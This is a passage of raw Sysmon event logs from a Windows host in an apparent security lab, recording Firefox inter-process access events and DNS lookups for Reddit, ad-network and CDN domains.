Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.140{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.067{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.052{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.609{59A5CD1D-945A-6005-3305-00000000A301}7052d1ykf07e75w7ss.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.609{59A5CD1D-945A-6005-3305-00000000A301}7052c.aaxads.com0type: 5 wildcard.aaxads.com.edgekey.net;type: 5 e12767.d.akamaiedge.net;::ffff:104.84.117.130;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.607{59A5CD1D-945A-6005-3305-00000000A301}7052d1ykf07e75w7ss.cloudfront.net099.84.88.20;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.606{59A5CD1D-945A-6005-3305-00000000A301}7052c.amazon-adsystem.com0type: 5 d1ykf07e75w7ss.cloudfront.net;::ffff:99.84.88.20;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.605{59A5CD1D-945A-6005-3305-00000000A301}7052www.googletagservices.com0type: 5 pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.685{59A5CD1D-945A-6005-3305-00000000A301}7052a.thumbs.redditmedia.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.543{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.535{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.371{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.365{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.350{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.284{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.276{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.266{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.250{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.233{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.971{59A5CD1D-8E56-6005-2E00-00000000A301}246420.88.84.99.in-addr.arpa.0type: 12 server-99-84-88-20.muc50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.971{59A5CD1D-8E56-6005-2E00-00000000A301}2464130.117.84.104.in-addr.arpa.0type: 12 a104-84-117-130.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000017664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.507{59A5CD1D-945A-6005-3305-00000000A301}7052unbouncepages.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.505{59A5CD1D-945A-6005-3305-00000000A301}7052unbouncepages.com054.93.101.66;18.196.95.178;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.505{59A5CD1D-945A-6005-3305-00000000A301}7052go.helixsleep.com0type: 5 unbouncepages.com;::ffff:18.196.95.178;::ffff:54.93.101.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.501{59A5CD1D-945A-6005-3305-00000000A301}7052lps.innogames.com02a00:1f78:fffd::d430:6225;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.499{59A5CD1D-945A-6005-3305-00000000A301}7052lps.innogames.com0212.48.98.37;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.499{59A5CD1D-945A-6005-3305-00000000A301}7052om.forgeofempires.com0type: 5 lps.innogames.com;::ffff:212.48.98.37;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.360{59A5CD1D-945A-6005-3305-00000000A301}7052v.redd.it0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.087{59A5CD1D-945A-6005-3305-00000000A301}7052www.redditmedia.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.020{59A5CD1D-945A-6005-3305-00000000A301}7052gql.reddit.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.611{59A5CD1D-945A-6005-3305-00000000A301}7052e12767.d.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.609{59A5CD1D-945A-6005-3305-00000000A301}7052e12767.d.akamaiedge.net0104.84.117.130;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.884{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.883{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.785{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.785{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.609{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.250{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.241{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.225{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.984{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.950{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.947{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla 